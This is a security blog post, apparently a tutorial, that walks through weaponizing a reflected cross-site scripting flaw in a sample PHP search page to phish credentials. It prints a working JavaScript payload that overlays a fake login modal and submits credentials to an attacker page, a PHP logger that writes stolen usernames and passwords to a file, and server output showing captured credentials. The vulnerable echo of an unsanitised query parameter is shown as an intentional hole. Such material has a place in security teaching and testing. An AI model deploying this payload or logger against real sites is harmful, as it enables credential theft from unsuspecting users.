304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

XSS Phishing for Fun and Credentials!

Since it came up in a recent conversation, I figured I would share an XSS phishing technique!

XSS Phishing – Introduction

If you’ve never seen it before, XSS phishing is a common vector for weaponizing reflected cross-site scripting.

It can come in a variety of forms, but I’m going to show an example of credential harvesting using it.

Vulnerable Application

First, I’ll reuse part of my vulnerable application from the XSS Attack Chain.

In this case, all I need is the search page to demonstrate this payload.

    $query = $_GET['q'];
    echo "<i>Your search query is $query</i>"

XSS Phishing - Vulnerable Application


First, I’ll need to confirm that the page is vulnerable to XSS.

In this case, I’ll use a simple alert payload:


As you can see, the alert fires off.

XSS Phishing - Alert

XSS Phishing – Payload and Credential Capture

First, to capture credentials, I needed to create a malicious JavaScript payload.

You can find the payload below, but it does the following things:

  • Create an opaque background to put emphasis on the “pop-up”.
  • Display a modal login form with an error message.
  • Submit the credentials back to a different site (in this case, the attacker).
  • Create a cookie so the payload can only be fired off once.
  • Redirect the user back to a valid page. In this case, the redirect goes to a valid search.
    var html = `
<div id=\"bg\" style=\"position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0\">
<div id=\"form\" style=\"position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px\">
    <p>An error occurred. Please login again.</p>
    <form method=\"POST\" action=\"http://localhost:8888/login.php\">
        <p>Username <input type=\"text\" name=\"username\"></p>
        <p>Password <input type=\"password\" name=\"password\"></p>
        <p><input type=\"submit\" value=\"Login\"></p>
</div> `;

    var expire = new Date();
    expire.setFullYear(expire.getFullYear() + 1);
    var cookie = "runonce=true; path=/; expires=" + expire.toUTCString();
    var div = document.createElement("div");
    if (document.cookie.indexOf("runonce=") < 0) {
        div.innerHTML = html;
        document.cookie = cookie;

In addition to the malicious JavaScript, we need a page at login.php to capture the user’s credentials.

  $log = "creds.txt";
  $date = date("Y-m-d h:i:s A");
  $username = $_POST["username"];
  $password = $_POST["password"];
  $file = fopen("$log", "a+");
  fputs($file, "$date | USERNAME: $username | PASSWORD: $password\n");
  header( 'Location: http://localhost:1234/?q=test');

The Attack

First, I URL encoded the XSS payload to make it easier to paste in a URL.


Next, I visited the malicious URL and verified that the payload worked.

XSS Phishing - Fake Login Prompt

When the error message popped up, I entered in some credentials to the box, similar to the way that a user would.

I was able to view the post to login.php, so the logger was able to capture the credentials.

[email protected]:~/xss# php -S localhost:8888
PHP 7.2.4-1 Development Server started at Tue Apr 24 13:52:09 2018
Listening on http://localhost:8888
Document root is /root/xss
Press Ctrl-C to quit.
[Fri Apr 27 20:40:32 2018] ::1:54596 [302]: /login.php

Finally, when I opened the log file, I was able to viewed the user’s stolen credentials!

2018-04-27 08:40:32 PM | USERNAME: admin | PASSWORD: SuperSecretPassw0rd

XSS Phishing – Conclusion

Hopefully this was a useful example of actually weaponizing XSS.

I still have a few more filter avoidance posts in the pipeline, so stay tuned for those.

Let me know if you have any other XSS ideas, exploits, or payloads!


Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.